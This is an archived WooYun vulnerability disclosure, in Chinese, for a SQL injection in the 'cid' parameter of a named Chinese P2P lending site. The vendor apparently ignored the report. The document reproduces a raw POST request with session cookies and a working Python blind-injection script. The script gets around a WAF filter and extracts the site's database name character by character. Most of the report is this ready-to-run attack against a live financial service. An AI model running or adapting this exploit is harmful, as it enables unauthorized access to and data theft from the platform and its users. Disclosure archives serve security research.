乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开
P2P投资理财安全之惠众金融主站存在SQL注入可绕过waf保护
https://www.hzjr.com/
POST /crowd/order.html HTTP/1.1Content-Length: 110Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: https://www.hzjr.com:443/Cookie: PHPSESSID=i5cnja8cm3d9v5qkcee6ol3m96; nbKK_2132_saltkey=s6lXWx52; nbKK_2132_lastvisit=1442328642; nbKK_2132_sid=LbxUR0; nbKK_2132_lastact=1442335018%09member.php%09logging; nbKK_2132_onlineusernum=10; back_url=http%3A%2F%2Fwww.hzjr.com%2Findex.php%2FHome%2FMember%2Flogin; nbKK_2132_home_readfeed=1442332247; nbKK_2132_home_diymode=1; nbKK_2132_st_t=0%7C1442332269%7C17674e81a4621395282e9ed46434a1cd; nbKK_2132_forum_lastvisit=D_46_1442332247D_65_1442332269; nbKK_2132_visitedfid=65D54D46; nbKK_2132_st_p=0%7C1442332269%7C17674e81a4621395282e9ed46434a1cd; nbKK_2132_viewid=tid_6616; nbKK_2132_sendmail=1; remember=4111111111111111; nbKK_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_3994%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pid%253D7182%2526pmid%253D0%2526tid%253D278%2526touid%253D3994; CNZZDATA5907335=cnzz_eid%3D303063732-1442328402-null%26ntime%3D1442328402; IESESSION=alive; pgv_pvi=9282741248; pgv_si=s2817908736; ykss=3f43f8551e18a76d22239b15; BAIDUID=2E61313B56FC00406F8893F316F92DF6:FG=1; nbKK_2132_atarget=1Host: www.hzjr.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*age=20&cid=10&order_money=1&phone=555-666-0606&real_name=bebyjxpx&remark=1
cid参数存在注入,过滤了>符号为真时,得到db长度为8:
为假时:
附脚本:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print 'start to retrive DB:'user = ''for i in range(1,9): for payload in payloads: conn = httplib.HTTPConnection('www.hzjr.com', timeout=60) params = { 'age': '20', 'order_money': '1', 'cid': "10 AND greatest(ascii(mid(lower(database()),%s,1)),1)=%s AND 860=860" % (i, ord(payload)), 'phone': '555-666-0606', 'real_name':'bebyjxpx', 'remark':'1', } conn.request(method='POST', url='/crowd/order.html', body = urllib.urlencode(params), headers = headers) resp = conn.getresponse() html_doc = resp.read().decode('utf-8') conn.close() #print html_doc print '.', if html_doc.find(u'众筹未开始或已结束') > 0: # True user += payload print '\n[in progress]', user breakprint '\nMysql DB is', user
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)